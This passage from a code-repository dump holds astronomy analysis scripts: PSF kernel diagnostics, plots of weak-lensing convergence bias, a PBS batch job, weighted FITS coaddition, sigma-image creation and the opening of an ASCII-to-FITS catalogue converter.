phot['aperture_sum'])\n\t\tcog_moff = pylab.append(cog_moff, phot_moff['aperture_sum'])\n\tcogs.append(cog)\n\tcogs_moffs.append(cog_moff)\n\n\n\tprint imnames[i], '%.2f' % fwhm\n\n\n### PSF with largest FWHM\nind_max_fwhm = fwhms.index(max(fwhms))\ncolor = pylab.cm.jet(ind_max_fwhm * 1. / (len(psfs) - 1))\nsp2.plot(r_uniq * px_scale, profiles[ind_max_fwhm], color=color, lw=3)\n\n\n\n\n\nsp2.legend(loc=1, title=lens_name)\nsp1.axis([-0.1, 4.4, -0.1, 1.1])\nsp2.axis([-0.1, 4.4, -0.1, 1.1])\n\n\n\n\n\n\n### Plotting curves of growth\ncogs = pylab.array(cogs)\nmean_cog = pylab.average(cogs, axis=0)\n\nfor i in range(len(psfs)):\n\tsp3.plot(radii * px_scale, cogs[i] / cogs_moffs[ind_max_fwhm], color=pylab.cm.jet(i * 1. / (len(psfs) - 1)))\n\n\n\nsp3.axis([-0.1, 4.4, 0.87, 1.13])\nsp4.axis([-0.1, 4.4, 0.87, 1.13])\n\n\n\n\n\n\nfor i in range(len(fwhms)):\n\n\tif i == ind_max_fwhm:\n\t\ttarget_cog = cogs[i]\n\t\tcogs_conv.append(cogs[i])\n\t\tcontinue\n\n\tpsf1 = psfs[i]\n\tpsf2 = psfs[ind_max_fwhm]\n\n\tmoff1 = moffat_psfs[i]\n\tmoff2 = moffat_psfs[ind_max_fwhm]\n\n\tmoffTomcz1 = moffatTomczak_psfs[i]\n\tmoffTomcz2 = moffatTomczak_psfs[ind_max_fwhm]\n\n\t### Masking out corners\n\tinds_corners = pylab.where(rr > dx/2)\n\tmoff1[inds_corners] *= 0\n\tmoff2[inds_corners] *= 0\n\tmoffTomcz1[inds_corners] *= 0\n\tmoffTomcz2[inds_corners] *= 0\n\n\t### Creating hybrid PSFs by replacing pixes <(bg+3sigma) with the model\n\tindslo1 = pylab.where(psf1 < bgs[i] + 3*scatters[i])\n\tindslo2 = pylab.where(psf1 < bgs[ind_max_fwhm] + 3*scatters[ind_max_fwhm])\n\n\thybrid1, hybrid2 = psf1 * 1., psf2 * 1.\n\thybrid1[indslo1] = moffTomcz1[indslo1]\n\thybrid2[indslo2] = moffTomcz2[indslo2]\n\n\n\n\tniter = 100\n\n\t'''\n\t### Data kernel\n\tkernel_data = restoration.richardson_lucy(psf2, psf1, iterations=niter)\n\tkernel_data /= kernel_data.sum()\n\tk0 = 'kernel_' + imnames[ind_max_fwhm] + '-' + imnames[i] + '_data.fits'\n\tfits.writeto(k0, kernel_data, clobber=1)\n\n\t### Moffat kernel\n\tkernel_moff = restoration.richardson_lucy(moff2, moff1, iterations=niter)\n\tkernel_moff /= kernel_moff.sum()\n\tk1 = 'kernel_' + imnames[ind_max_fwhm] + '-' + imnames[i] + '_moff.fits'\n\tfits.writeto(k1, kernel_moff, clobber=1)\n\n\t### Moffat-Tomczak kernel\n\tkernel_moffTomcz = restoration.richardson_lucy(moffTomcz2, moffTomcz1, iterations=niter)\n\tkernel_moffTomcz /= kernel_moffTomcz.sum()\n\tk2 = 'kernel_' + imnames[ind_max_fwhm] + '-' + imnames[i] + '_moffTomcz.fits'\n\tfits.writeto(k2, kernel_moffTomcz, clobber=1)\n\t'''\n\n\t### Hybrid kernel\n\tkernel_hybrid = restoration.richardson_lucy(hybrid2, hybrid1, iterations=niter)\n\tkernel_hybrid /= kernel_hybrid.sum()\n\tk3 = 'kernel_' + imnames[ind_max_fwhm] + '-' + imnames[i] + '_hybrid.fits'\n\tfits.writeto(k3, kernel_hybrid, clobber=1)\n\n\n\n\t### Adding info to kernel headers\n\tfor kern in [k3]:\n\t\tf = fits.open(kern, mode='update')\n\t\th = f[0].header\n\t\th['NITER'] = (niter, 'number of Richardson Lucy iterations')\n\t\tf.close()\n\n\n\n\t### Testing by convolving psf1 by kernel\n\tconv = signal.convolve2d(psf1, kernel_hybrid, mode='same')\n\n\tfits.writeto('conv_'+ imnames[ind_max_fwhm] + '-' + imnames[i] + '.fits', conv, clobber=1)\n\tfits.writeto('resid_'+ imnames[ind_max_fwhm] + '-' + imnames[i] + '.fits', psf2 - conv, clobber=1)\n\n\tprint 'generated kernels from', imnames[i], 'to', imnames[ind_max_fwhm]\n\n\n\n\n\t### Estimating convolved FWHM\n\tprofile = pylab.array([])\n\tfor ri in r_uniq:\n\t\trinds = pylab.where(rr == ri)\n\t\tprofile = pylab.append(profile, pylab.mean(conv[rinds]))\n\tfwhm = 2 * pylab.interp(profile.max()/2., profile[::-1], r_uniq[::-1])\n\tfwhms_conv.append(fwhm)\n\n\n\t### Plotting profiles\n\tcolor = pylab.cm.jet(i * 1. / (len(psfs) - 1))\n\tsp2.plot(r_uniq * px_scale, profile / profile.max(), color=color, lw=3)\n\n\n\t### Measuring curve of growth\n\tcog = pylab.array([])\n\tfor aper in apers:\n\t\tphot = aperture_photometry(conv, aper)\n\t\tcog = pylab.append(cog, phot['aperture_sum'])\n\tcogs_conv.append(cog)\n\n\n\n\n\n\n\n### Plotting curves of growth\ncogs_conv = pylab.array(cogs_conv)\nmean_cog_conv = pylab.average(cogs_conv, axis=0)\n\nfor i in range(len(psfs)):\n\tsp4.plot(radii * px_scale, cogs_conv[i] / cogs[ind_max_fwhm], color=pylab.cm.jet(i * 1. / (len(psfs) - 1)))\n\n\n\n### Plotting estimate for catalog aperture as maximum FWHM +30%\nsp4.axvline(max(fwhms) * px_scale, color='k', ls='--', lw=3, label='FWHM')\nsp4.axvline(max(fwhms) * px_scale * 1.3, color='k', lw=3, label='\"ideal\"\\naperture')\n\nsp4.legend(loc=1, prop={'size':18})\nfig.savefig('psfdiagnostics.png' , dpi=250)\n\n" }, { "alpha_fraction": 0.6590761542320251, "alphanum_fraction": 0.7085104584693909, "avg_line_length": 57.306724548339844, "blob_id": "6171b4623376e60e5691f689fcd6459da7347f53", "content_id": "a88b609973f8262cfac3fed3a8edffe09bfa9709", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13877, "license_type": "no_license", "max_line_length": 175, "num_lines": 238, "path": "/python/catalogue_utilities/plotkappabiasphil.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Use as python plot plotkappabiasphil.py WFI2033 5 23 45\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\nimport sys\nimport os\nfrom os import system\n\nlens = str(sys.argv[1])\ninner = str(sys.argv[2])\nmag = str(sys.argv[3])\nrad = str(sys.argv[4])\n\nbins = np.linspace(-0.20,0.20,300)\nhalfwidth = (bins[1]-bins[0])/2\n\nroot = \"/Users/eduardrusu/Dropbox/Davis_work/code/GOODCODE/WFI2033kappa/\"\n\ncol1 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol2 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_z_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol3 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_mass_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol4 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_mass2_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol5 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_mass3_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol6 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol7 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_zoverr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol8 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_massoverr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol9 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_mass2overr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol10 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_mass3overr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol11 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_mass2rms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol12 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_mass3rms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol13 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_mass2overrrms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol14 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_mass3overrrms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol15 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_flexion_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol16 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_tidal_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol17 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_SIS_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol18 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_SIShalo_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\n'''\ncol1 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol2 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_z_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol3 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol4 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass2_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol5 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass3_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol6 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol7 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_zoverr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol8 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_massoverr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol9 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass2overr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol10 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass3overr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol11 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass2rms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol12 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass3rms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol13 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass2overrrms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol14 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass3overrrms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol15 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_flexion_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol16 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_tidal_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol17 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_SIS_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol18 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_SIShalo_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\n'''\nmin_kappa_plot = -0.04\nmax_kappa_plot = 0.04\nnRows = 6\nnCols = 3\nnPlots = 18\nfontlabel = 18\n\nplt.clf()\n#plt.axis([min_kappa_plot, max_kappa_plot, 0, 800])\nfig = plt.figure()\nax1 = fig.add_subplot(6,3,1)\nax = plt.subplot(6,3,1, sharex=ax1, sharey=ax1)\n#ax.set_aspect(1, adjustable='datalim')\n\nax=plt.subplot(6,3,1, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col1/np.sum(col1 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$1$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,2, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col2/np.sum(col2 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$z$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,3, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col3/np.sum(col3 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$M_\\star$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,4, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col4/np.sum(col4 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$M^2_\\star$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,5, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col5/np.sum(col5 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$M^3_\\star$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,6, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col6/np.sum(col6 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$1/r$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,7, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col7/np.sum(col7 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$z/r$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,8, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col8/np.sum(col8 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$M_\\star/r$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,9, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col9/np.sum(col9 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$M^2_\\star/r$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,10, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col10/np.sum(col10 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$M^3_\\star/r$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,11, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col11/np.sum(col11 * (bins[1]-bins[0])),'k-',label=\"xxx\")\n#ax.text(0.8, 0.85, \"$M/r^3$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\nax.text(0.6, 0.6, \"$M^2_\\mathrm{\\star,rms}$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,12, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col12/np.sum(col12 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$M^3_\\mathrm{\\star,rms}$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,13, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col13/np.sum(col13 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$M^2_\\star/r_\\mathrm{,rms}$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,14, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col14/np.sum(col14 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$M^3_\\star/r_\\mathrm{,rms}$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,15, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.tick_params(axis='x',which='both',bottom='off',top='off',labelbottom='off')\nplt.plot(bins[:-1],col15/np.sum(col15 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$M_\\star/r^3$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,16, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nax.set_xticklabels([-0.04,-0.03,-0.02,-0.01,0,0.01,0.02,0.03])\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col16/np.sum(col16 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$M_\\star/r^2$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,17, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nax.set_xticklabels([-0.04,-0.03,-0.02,-0.01,0,0.01,0.02,0.03])\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.xticks(rotation='vertical')\nplt.plot(bins[:-1],col17/np.sum(col17 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$\\sqrt{M_\\star}/r$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,18, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nax.set_xticklabels([-0.04,-0.03,-0.02,-0.01,0,0.01,0.02,0.03,0.04])\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col18/np.sum(col18 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.5, 0.6, \"$\\sqrt{M_h}/r$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\n# hide the plots with no data in the grid\nax=plt.subplot(6,3,16, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\nplt.xticks(rotation='vertical')\nax=plt.subplot(6,3,18, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\nplt.xticks(rotation='vertical')\n\nindex = 1\nfor r in range(1, nRows +1):\n for c in range(1, nCols + 1):\n ax = plt.subplot(nRows, nCols, index, sharex=ax1, sharey=ax1)\n index += 1\n # Turn off y tick labels for all but the first column.\n if ((c != 1) and (index <= nPlots)):\n plt.setp(ax.get_yticklabels(), visible=False)\n plt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\n # Turn off x tick lables for all but the bottom plot in each column.\n if ((nPlots - index) >= nCols):\n plt.setp(ax.get_xticklabels(), visible=False)\n plt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\n if index == 18:\n plt.setp(ax.get_yticklabels(), visible=False)\n plt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\n\nfig.text(0.5, 0.025, '$\\kappa-\\kappa_\\mathrm{true}$', ha='center', va='center', size='22')\nplt.subplots_adjust(wspace=0, hspace=0)\nplt.subplots_adjust(left=0.02, right=0.98, top=0.98, bottom=0.15)\n\nplt.savefig('%sbiasphil_%s_%s_%s_%s.png' % (root,lens,inner,mag,rad), dpi=250)\n#plt.savefig('%sbiasphil_%s_%s_%s_%s_gamma.png' % (root,lens,inner,mag,rad), dpi=250)\nprint 'Done!'\n" }, { "alpha_fraction": 0.6275303363800049, "alphanum_fraction": 0.6639676094055176, "avg_line_length": 13.529411315917969, "blob_id": "26118ab0763282c3fd0c00d748ffd88bbad9bfff", "content_id": "53df1867d0175bf70a29ec030ade102079484630", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 247, "license_type": "no_license", "max_line_length": 36, "num_lines": 17, "path": "/python/scripts/NAOJ/batch2_ascii.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q4\n#PBS -o Logb2.out\n#PBS -e Logb2.err\n#PBS -N 2\n#PBS -l mem=40gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython ascii_to_fits2.py\n" }, { "alpha_fraction": 0.688850462436676, "alphanum_fraction": 0.7156438827514648, "avg_line_length": 38.86206817626953, "blob_id": "40593975ee3f3e135243a8a8f32c8230e36ea5ce", "content_id": "b31787ac6997f13873fee1f6347655eb06d39bc9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1157, "license_type": "no_license", "max_line_length": 295, "num_lines": 29, "path": "/python/reduction_utilities/weightedcoadd.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Weighted coaddition of science frames and weighted frames. A final science frame and variance frame is created. Currently only works for variance frames as weighted frames. Uses equations 22 and 23 from the Swarp manual. If regions of the weight files are NaN, they are replaced with infinity.\n# Run as: python weightedcoadd sci1.fits sci2.fits ... var1.fits var2.fits ... outsci.fits outvar.fits\n\nimport numpy as np\nimport sys\nimport math\nimport numpy as np\nfrom numpy import inf\nfrom astropy.io import fits\n\nnr = (len(sys.argv)-3)/2\n\nfor i in range(nr):\n image = fits.open(sys.argv[1+i])\n weight = fits.open(sys.argv[1+i+nr])\n datai = image[0].data\n dataw = weight[0].data\n dataw[np.isnan(dataw)]=np.inf\n if i == 0:\n finalweight = 1.0/dataw # for variance\n finaldatanominator = 1.0/dataw * datai\n else:\n finalweight = finalweight + 1.0/dataw\n finaldatanominator = finaldatanominator + 1.0/dataw * datai\n\nimage[0].data = 1.0 * finaldatanominator/finalweight # to preserve the header info\nweight[0].data = 1.0/finalweight\nimage.writeto(sys.argv[-2],clobber=True)\nweight.writeto(sys.argv[-1],clobber=True)\n\n" }, { "alpha_fraction": 0.6926863789558411, "alphanum_fraction": 0.7250351905822754, "avg_line_length": 47.034481048583984, "blob_id": "76607b51a6c7635516b993c3817734ef348e1264", "content_id": "85c36f715ea65378fff4be3486d40f2ebc54f17a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1422, "license_type": "no_license", "max_line_length": 177, "num_lines": 29, "path": "/python/modeling_utilities/sigma.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Create a simple sigma image given the original image and assuming just Poisson noise. This is written for Chih-Fan's iteration code, but can be used in general\r\n# Since the original image is typically sky subtracted, the code uses the sky variance in a selected empty region in the image, and Poisson for everything above 2 sigma of that.\r\n# Also defines a box outside of which the noise is set very large\r\n\r\nimport sys\r\nimport os\r\nimport numpy as np\r\nfrom astropy.io import fits\r\n\r\nemptyloc = [30,200] # center of box with no sources in the image, to compute statistics\r\nemptysize = 20 # semilength of box\r\noutsidebox_x = [130,230] # min and max coord outside of wchich noise is considered infinite\r\noutsidebox_y = [80,180]\r\n\r\nfilein = str(sys.argv[1])\r\nimage = fits.open(filein)\r\ndata = image[0].data.T # so I work in the natural axis\r\n\r\nstd = np.std(data[emptyloc[0]-emptysize:emptyloc[0]+emptysize,emptyloc[1]-emptysize:emptyloc[1]+emptysize])\r\ndata = np.abs(data) + std ** 2\r\ndata = np.sqrt(data)\r\n\r\nbox = data[outsidebox_x[0]:outsidebox_x[1],outsidebox_y[0]:outsidebox_y[1]]\r\ndata[outsidebox_x[0]:outsidebox_x[1],outsidebox_y[0]:outsidebox_y[1]] = -np.abs(box)\r\ndata[data > 0] = 100 * np.max(np.abs(box))\r\ndata[outsidebox_x[0]:outsidebox_x[1],outsidebox_y[0]:outsidebox_y[1]] = np.abs(box)\r\n\r\nimage[0].data = data.T.astype(\"float32\") # Hostlens expects this\r\nimage.writeto(filein[:-5]+\"_sigma.fits\",clobber=True)\r\n" }, { "alpha_fraction": 0.5458922386169434, "alphanum_fraction": 0.5895275473594666, "avg_line_length": 54.38333511352539, "blob_id": "3016bda2d4996c0a6456a51c868212f29c78d60f", "content_id": "45a6d970931e05356a8f145e5a6f422b84d8742f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3323, "license_type": "no_license", "max_line_length": 186, "num_lines": 60, "path": "/python/catalogue_utilities/ascii_to_fitsPG1115.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# CE Rusu, July 22 2018\n# Reads an ascii file with multiple columns and converts it into a FITS file with same data types and header. Optionally outut only selected columns and conditions.\n\nimport sys\nimport numpy as np\n#import fitsio # https://github.com/esheldon/fitsio\nimport astropy.table as table\nimport glob\nimport time\nimport collections\n\n#root = '/lfs08/rusucs/HE0435/'\nroot = '/Volumes/LaCieDavis/CFHTlens/'\nrootout = '/Volumes/LaCieDavis/CFHTcatalogues/'\n#list = glob.glob(root+'nobetaave3435NEWMEASUREDmedinject_ugriz_HE0435_GGL_los_8_*_120.cat')\nlistfile = '/Users/cerusu/GITHUB/zMstarPDF/python/catalogue_utilities/fields.cat'\nlist = np.genfromtxt(listfile,dtype='S')\nstart_time = time.time()\n#for i in range(1):\nfor i in range(len(list)):\n print list[i]\n #list=['W3p2p3']\n headfile = open(root+list[i]+'.cat', 'r')\n head1 = headfile.readline() # first line\n head2 = headfile.readline() # second line\n head = False\n if (head1.split()[0][0] == '#' and len(head1.split()[0:]) == len(head2.split())) or (head1.split()[0] == '#' and len(head1.split()[1:]) == len(head2.split())): # if there is a header\n if head1.split()[0][0] == '#' and len(head1.split()[0:]) == len(head2.split()):\n head1 = head1.split()[0:] # ignore the # character\n head1[0] = head1[0][1:]\n else: head1 = head1.split()[1:]\n head = True\n dict = collections.OrderedDict()\n for j in range(len(head2.split())):\n if head1[j] in ['MASK','star_flag','MAG_r','MAGERR_r','id','ALPHA_J2000','DELTA_J2000','Flag']: 